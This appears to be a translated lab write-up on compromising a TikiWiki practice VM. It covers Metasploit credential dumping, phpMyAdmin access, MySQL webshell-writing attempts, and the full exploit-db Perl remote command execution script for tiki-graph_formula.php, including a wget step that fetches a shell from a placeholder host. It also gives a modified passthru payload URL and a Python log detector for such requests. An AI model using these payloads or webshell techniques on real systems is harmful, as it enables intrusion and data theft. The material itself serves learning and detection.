
tiki-graph_formula.php code execution vulnerability reproduction (maybe??)

1. A virtual machine image I dug up from somewhere (no idea when it ended up on my disk)

Target VM image: https://pan.baidu.com/s/1ZgW8WaqXp8ULJbKCSgauFg

Extraction code: 1y8f

Booting it up, the configuration shows that this thing is TikiWiki.

2. Can't help being curious about new stuff, so I ran nikto against it and found some strange things

I had no hope at all and really didn't expect the scan to find anything, but there is a phpinfo.php, a phpMyAdmin, and what looks like a TikiWiki vulnerability.

3. Metasploit

Open msf and search for tikiwiki.

Five payloads; test them one by one.

use auxiliary/admin/tikiwiki/tikidblib    # load this PoC module
set RHOSTS 192.168.5.129                   # target IP
show options                               # check whether anything is wrong
run                                        # attack

Did the attack succeed? (Ah, it really did; a bit too easy.) This is where we get the database username and password, as well as the database name.

4. phpMyAdmin

Using the password obtained from the attack, try logging in: login succeeds.

5. getshell && writing a webshell via MySQL

Because this is the root account (DBA), we can go straight in and write a one-line shell.

Writing a shell: INTO OUTFILE / DUMPFILE
SELECT '' INTO OUTFILE '/var/www/tikiwiki/cmd.php';

Tried it, but it won't write: "Can't create file" error.


I then intended to write via the log backup method, and found the following:


wtf? This variable doesn't exist?

Then check whether there is write permission:

SHOW VARIABLES LIKE 'secure_file_priv';


Reference: https://blog.csdn.net/Auuuuuuuu/article/details/83690362

It turns out writing is allowed, but damn, then why does it fail?


6. Getting anxious

Also tried the phpMyAdmin 3.0 module (exploit/unix/webapp/phpmyadmin_config), to no avail.

Went back to the nikto scan results.


Here it clearly says that code injection may be possible, executing phpinfo().

After searching Baidu for a long time: the problem lies in tiki-graph_formula.php, and I found an exp.


Skimmed through it.


It seems to use passthru() to execute the command.

Full exp:

Link: https://www.exploit-db.com/exploits/4525

#!/usr/bin/perl
# TikiWiki <= 1.9.8 Remote Command Execution Exploit
#
# Description
# -----------
# TikiWiki contains a flaw that may allow a remote attacker to execute arbitrary commands. 
# The issue is due to 'tiki-graph_formula.php' script not properly sanitizing user input 
# supplied to the f variable, which may allow a remote attacker to execute arbitrary PHP 
# commands resulting in a loss of integrity.
# -----------
# Vulnerability discovered by ShAnKaR 
#
# $Id: milw0rm_tikiwiki.pl,v 0.1 2007/10/12 13:25:08 str0ke Exp $

use strict;
use LWP::UserAgent;

my $target = shift || &usage();
my $proxy = shift;
my $command;

&exploit($target, "cat db/local.php", $proxy);

print "[?] php shell it?\n";
print "[*] wget http://www.youhost.com/yourshell.txt -O backups/shell.php\n";
print "[*] lynx " . $target . "/backups/shell.php\n\n";

while(1)
{
	print "tiki\# ";
	chomp($command = <STDIN>);
	exit unless $command;
	&exploit($target, $command, $proxy);
}

sub usage()
{
	print "[?] TikiWiki <= 1.9.8 Remote Command Execution Exploit\n";
	print "[?] str0ke \n";
	print "[?] usage: perl $0 [target]\n";
	print "    [target] (ex. http://127.0.0.1/tikiwiki)\n";
	print "    [proxy] (ex. 0.0.0.0:8080)\n";
	exit;
}

sub exploit()
{
	my($target, $command, $proxy) = @_;

	my $cmd = 'echo start_er;'.$command.';'.'echo end_er';
	
	my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd));

	my $conn = LWP::UserAgent->new() or die;
	$conn->agent("Mozilla/4.0 (compatible; Lotus-Notes/5.0; Windows-NT)");
	$conn->proxy("http", "http://".$proxy."/") unless !$proxy;
	
	my $out=$conn->get($target."/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.passthru($byte).die()&t=png&title=");

	if ($out->content =~ m/start_er(.*?)end_er/ms) {
		print $1 . "\n";
	} else { 
		print "[-] Exploit Failed\n";
		exit;
	}
}

# milw0rm.com [2007-10-12]

7. Getshell

The code execution vulnerability exists, so modify the payload:

http://192.168.5.129//tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.passthru('whoami').die()&t=png&title=http://cirt.net/rfiinc.txt
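From the defender's side, as an added example that is not part of the original post or the exploit's code: a small Python log check that flags requests to tiki-graph_formula.php whose f[] formula carries PHP calls such as passthru(), chr() or die() instead of plain math. The access-log lines are constructed for the example, in the shape of the payload above and the exp's chr() encoding.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample Apache access-log lines (not from the original post):
# one benign formula request, then two requests in the shape of the
# exploit-db PoC and the modified payload above.
SAMPLE_LOG = """\
192.168.5.1 - - [12/Oct/2019:10:00:01 +0800] "GET /tikiwiki/tiki-graph_formula.php?w=400&h=300&s=1&min=0&max=5&f[]=sin(x)&t=png&title=sin HTTP/1.1" 200 1843
192.168.5.1 - - [12/Oct/2019:10:00:07 +0800] "GET /tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.passthru('whoami').die()&t=png&title= HTTP/1.1" 200 213
192.168.5.1 - - [12/Oct/2019:10:00:09 +0800] "GET /tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.passthru(chr(105).chr(100)).die()&t=png&title= HTTP/1.1" 200 190
"""

# Common log format: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

# PHP callables the PoC abuses inside the formula; a legitimate formula
# is plain math such as sin(x) and never needs these.
DANGEROUS = re.compile(
    r'\b(passthru|system|exec|shell_exec|popen|eval|die)\s*\(|\bchr\s*\(', re.I
)


def is_graph_formula_attack(url: str) -> bool:
    """True if the request targets tiki-graph_formula.php with a suspicious f[] value."""
    parts = urlsplit(url)
    if not parts.path.endswith('/tiki-graph_formula.php'):
        return False
    qs = parse_qs(parts.query, keep_blank_values=True)
    # f[] is the formula parameter the exploit injects into
    formulas = qs.get('f[]', []) + qs.get('f', [])
    return any(DANGEROUS.search(unquote(f)) for f in formulas)


def find_attacks(log_text: str) -> list:
    """Return one dict per log line that looks like a tiki-graph_formula.php injection."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and is_graph_formula_attack(m['url']):
            hits.append({'ip': m['ip'], 'ts': m['ts'],
                         'url': m['url'], 'status': m['status']})
    return hits
```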


One problem is that only a single command can be executed per request, passed in as the parameter. Personally I think the command should be turned into a byte stream (which is roughly how the exp handles it).

Finally, as a supplement: I later found this module in msf:

Matching Modules
================

   #  Name                                             Disclosure Date  Rank       Check  Description
   -  ----                                             ---------------  ----       -----  -----------
   0  exploit/unix/webapp/tikiwiki_graph_formula_exec  2007-10-10       excellent  Yes    TikiWiki tiki-graph_formula Remote PHP Code Execution
